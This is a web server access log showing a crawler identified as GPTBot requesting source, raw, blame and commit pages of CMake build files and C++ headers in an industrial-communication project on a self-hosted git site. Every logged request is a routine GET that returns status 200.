git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api" [Client 74.7.227.38] [Length 9955] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1" -[17/Feb/2026:17:59:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10306] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1" -[17/Feb/2026:17:59:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10693] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1" -[17/Feb/2026:17:59:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9950] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1" -[17/Feb/2026:17:59:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 12963] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:17:59:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11080] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:17:59:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake" [Client 74.7.227.38] [Length 9932] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake" -[17/Feb/2026:17:59:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/data_format.hpp?display=rendered" [Client 74.7.227.38] [Length 11045] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:17:59:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11081] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:17:59:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11080] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:17:59:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=rendered" [Client 74.7.227.38] [Length 11081] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:17:59:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api" -[17/Feb/2026:17:59:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9971] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:17:59:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 14329] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:17:59:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 12857] [Gzip 4.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:17:59:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 19983] [Gzip 9.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:17:59:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 11615] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:17:59:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:17:59:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 10007] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:17:59:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11345] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:17:59:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 14821] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:17:59:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 33296] [Gzip 10.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:17:59:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/data_format.hpp?display=rendered" [Client 74.7.227.38] [Length 11046] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:17:59:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13010] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:17:59:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 2092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" -[17/Feb/2026:17:59:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 14599] [Gzip 9.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" -[17/Feb/2026:17:59:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 9984] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" -[17/Feb/2026:17:59:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 1045] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" -[17/Feb/2026:17:59:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 9991] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" -[17/Feb/2026:17:59:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 12617] [Gzip 6.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" -[17/Feb/2026:17:59:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:17:59:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/query" -[17/Feb/2026:17:59:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 12317] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" -[17/Feb/2026:17:59:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 158] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" -[17/Feb/2026:17:59:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 10784] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" -[17/Feb/2026:17:59:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 23179] [Gzip 19.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" -[17/Feb/2026:17:59:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 9997] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" -[17/Feb/2026:17:59:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 9993] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" -[17/Feb/2026:17:59:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 15211] [Gzip 10.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" -[17/Feb/2026:17:59:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 9993] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" -[17/Feb/2026:17:59:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10265] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:17:59:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:17:59:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 42761] [Gzip 21.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" -[17/Feb/2026:17:59:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 9989] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" -[17/Feb/2026:17:59:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 2023] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 